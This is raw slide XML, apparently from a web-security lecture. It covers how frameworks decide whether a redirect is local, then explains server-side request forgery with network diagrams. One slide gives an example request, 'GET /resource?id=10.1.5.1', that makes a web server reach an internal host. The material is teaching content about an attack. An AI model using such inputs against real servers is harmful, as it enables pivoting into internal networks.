            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>if domain is included</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>if browser’s interpret URLs differently</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>if basic auth information is included</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>maybe the domain can be absolute, but whitelisted?</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Many frameworks (e.g. Django’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>is_safe_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, MVC’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>RedirectToLocal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>) provide redirection options that attempts to identify if the redirect is local.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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238"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1070075"/>
            <a:ext cx="8285400" cy="667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An attacker abuses server functionality to send requests to an internal service which is normally not directly accessible</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1"/>
            </a:br>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1670" name="Google Shape;1670;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444250" y="2506975"/>
            <a:ext cx="1863000" cy="245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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:endParaRPr sz="12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71" name="Google Shape;1671;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179825" y="2506975"/>
            <a:ext cx="1863000" cy="245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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Internal</a:t>
            </a:r>
            <a:endParaRPr sz="12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72" name="Google Shape;1672;p238"/>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Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1673" name="Google Shape;1673;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3957295" y="3476650"/>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Web Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1674" name="Google Shape;1674;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633825" y="2851800"/>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CI Server</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1675" name="Google Shape;1675;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011150" y="3442525"/>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Client</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1676" name="Google Shape;1676;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633825" y="3910975"/>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Internal </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Resource</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Provider</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1677" name="Google Shape;1677;p238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510675" y="3027050"/>
            <a:ext cx="4006200" cy="348600"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 22131"/>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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289350" y="2681900"/>
            <a:ext cx="838200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2352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239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444250" y="2506975"/>
            <a:ext cx="1863000" cy="245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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:endParaRPr sz="12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84" name="Google Shape;1684;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179825" y="2506975"/>
            <a:ext cx="1863000" cy="245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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Internal</a:t>
            </a:r>
            <a:endParaRPr sz="12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85" name="Google Shape;1685;p239"/>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Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1686" name="Google Shape;1686;p239"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1070075"/>
            <a:ext cx="8285400" cy="667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Server application receives a URI which points to an internal service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is authorized to access, which may return sensitive information or perform sensitive actions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Consider a web service that fetches resources from a resource provider</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1687" name="Google Shape;1687;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3957295" y="3476650"/>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Web Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1688" name="Google Shape;1688;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633825" y="2851800"/>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CI Server</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1689" name="Google Shape;1689;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011150" y="3442525"/>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Client</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1690" name="Google Shape;1690;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4334">
            <a:off x="1808534" y="3643127"/>
            <a:ext cx="2141702" cy="15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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633825" y="3910975"/>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Internal </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Resource</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Provider</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1692" name="Google Shape;1692;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="582550">
            <a:off x="4752402" y="3969241"/>
            <a:ext cx="1866028" cy="15131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39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1765950" y="3429005"/>
            <a:ext cx="3291900" cy="3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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>GET /resource?id=irp.com/123</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1694" name="Google Shape;1694;p239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-10183192">
            <a:off x="4756895" y="4188005"/>
            <a:ext cx="1865954" cy="15152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39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10799521">
            <a:off x="1786133" y="4047604"/>
            <a:ext cx="2155200" cy="15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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3444250" y="2506975"/>
            <a:ext cx="1863000" cy="245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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>DMZ</a:t>
            </a:r>
            <a:endParaRPr sz="12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1" name="Google Shape;1701;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179825" y="2506975"/>
            <a:ext cx="1863000" cy="245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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Internal</a:t>
            </a:r>
            <a:endParaRPr sz="12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2" name="Google Shape;1702;p240"/>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Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1703" name="Google Shape;1703;p240"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1070075"/>
            <a:ext cx="8285400" cy="667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A user is not permitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to access the internal CI server, however the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>web server in this instance is permitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to (perhaps not intentionally) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This allows a client to “pivot” to other internal resources!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" b="1"/>
            </a:br>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1704" name="Google Shape;1704;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3957295" y="3476650"/>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Web Server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1705" name="Google Shape;1705;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633825" y="2851800"/>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CI Server</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1706" name="Google Shape;1706;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011150" y="3442525"/>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Client</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1707" name="Google Shape;1707;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-4334">
            <a:off x="1808534" y="3643127"/>
            <a:ext cx="2141702" cy="15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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6633825" y="3910975"/>
            <a:ext cx="790200" cy="811500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6BBF4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Internal </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Resource</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>Provider</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1709" name="Google Shape;1709;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-884670">
            <a:off x="4752346" y="3283525"/>
            <a:ext cx="1865945" cy="15127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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1765950" y="3429005"/>
            <a:ext cx="3291900" cy="3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54626A"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>GET /resource?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>id=10.1.5.1</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1711" name="Google Shape;1711;p240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9965600">
            <a:off x="4756855" y="3502163"/>
            <a:ext cx="1866098" cy="15170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40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10799521">
            <a:off x="1786133" y="4047604"/>
            <a:ext cx="2155200" cy="15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Google Shape;966;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3098060" y="-304798"/>
            <a:ext cx="2947900" cy="1842925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="967" name="Google Shape;967;p142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3602350" y="606700"/>
            <a:ext cx="19557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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="968" name="Google Shape;968;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563260" y="1538127"/>
            <a:ext cx="0" cy="509400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="969" name="Google Shape;969;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2093545" y="1755963"/>
            <a:ext cx="0" cy="279900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="970" name="Google Shape;970;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7027037" y="1755963"/>
            <a:ext cx="0" cy="279900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="971" name="Google Shape;971;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965500" y="1538126"/>
            <a:ext cx="0" cy="229500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="972" name="Google Shape;972;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161000" y="1538126"/>
            <a:ext cx="0" cy="229500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="973" name="Google Shape;973;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2087800" y="1755937"/>
            <a:ext cx="1877700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="974" name="Google Shape;974;p142"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5161000" y="1755937"/>
            <a:ext cx="1877700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF4E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="975" name="Google Shape;975;p142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399850" y="2037687"/>
            <a:ext cx="2360700" cy="2360700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="6BBF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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737350" y="2037687"/>
            <a:ext cx="2360700" cy="2360700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
